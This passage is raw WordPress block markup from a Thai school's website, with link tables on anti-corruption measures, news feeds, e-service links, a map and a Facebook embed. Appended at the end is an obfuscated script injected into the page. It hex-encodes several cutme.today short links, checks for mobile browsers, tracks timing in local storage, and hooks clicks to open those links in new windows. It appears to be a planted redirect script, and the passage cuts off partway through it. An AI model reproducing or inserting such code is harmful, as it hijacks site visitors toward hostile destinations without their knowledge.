จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const 